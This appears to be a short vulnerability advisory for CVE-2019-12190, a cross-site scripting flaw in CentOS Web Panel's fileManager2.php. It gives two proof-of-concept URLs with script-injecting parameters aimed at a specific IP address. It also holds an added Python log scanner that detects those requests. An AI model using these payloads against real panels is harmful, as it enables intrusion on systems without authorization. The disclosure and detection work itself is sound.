CVE-2019-12190 - CentOS-WebPanel XSS vulnerability
Latest commit f19c2c5 May 20, 2019
CVE-2019-12190

CVE-2019-12190 - CentOS-WebPanel XSS vulnerability

Information

Description: XSS was discovered in CentOS-WebPanel.com (aka CWP) CentOS Web Panel through 0.9.8.747 via the testacc/fileManager2.php fm_current_dir parameter.

Researcher: Enter of VinCSS (Vingroup)

Proof-of-concept

  1. Log in to the CentOS Web Panel using user credentials. https://79.137.25.230:2083
  2. Access the link https://79.137.25.230:2083/cwp_3633e125a390bd3d/testacc/fileManager2.php?frame=2&fm_current_dir=/%3C/script%3E%3Cscript%3Ealert(XSS);%3C/script%3E or https://79.137.25.230:2083/cwp_3633e125a390bd3d/testacc/fileManager2.php?action=7&fm_current_dir=/home/testacc/&filename=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
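
Detection sketch for the two request shapes above, added here as an example and not part of the original advisory: it scans web access-log lines for requests to fileManager2.php whose fm_current_dir or filename value decodes to angle brackets. The combined log format, the constructed sample lines and all function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

TARGET_SCRIPT = "fileManager2.php"               # script named in the advisory
WATCHED_PARAMS = {"fm_current_dir", "filename"}  # parameters used in the PoC links
# Assumption: angle brackets never belong in a directory or file name here.
MARKUP = re.compile(r"[<>]")
# Assumption: combined-format access log, request line inside double quotes.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so %253C is treated like %3C."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(url):
    """Return sorted names of watched parameters whose value carries markup."""
    parts = urlsplit(url)
    if not parts.path.endswith("/" + TARGET_SCRIPT):
        return []
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in WATCHED_PARAMS and MARKUP.search(decode_fully(value)):
            hits.add(name)
    return sorted(hits)

def scan(lines):
    """Yield (line_number, parameter_names) for matching log lines."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            params = suspicious_params(match.group(1))
            if params:
                yield number, params

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '203.0.113.7 - - [20/May/2019:10:00:01 +0000] "GET /cwp_x/testacc/fileManager2.php?frame=2&fm_current_dir=/home/testacc/ HTTP/1.1" 200 5120',
    '203.0.113.9 - - [20/May/2019:10:00:05 +0000] "GET /cwp_x/testacc/fileManager2.php?frame=2&fm_current_dir=/%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5301',
    '203.0.113.9 - - [20/May/2019:10:00:09 +0000] "GET /cwp_x/testacc/fileManager2.php?action=7&fm_current_dir=/home/testacc/&filename=%253Cscript%253E HTTP/1.1" 200 4988',
    '203.0.113.7 - - [20/May/2019:10:00:12 +0000] "GET /index.php?filename=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, params in scan(SAMPLE):
        print(f"line {number}: markup in {', '.join(params)}")
```

Matches are triage leads only; the fix belongs in the panel itself, by upgrading past the affected version and HTML-encoding these parameters on output.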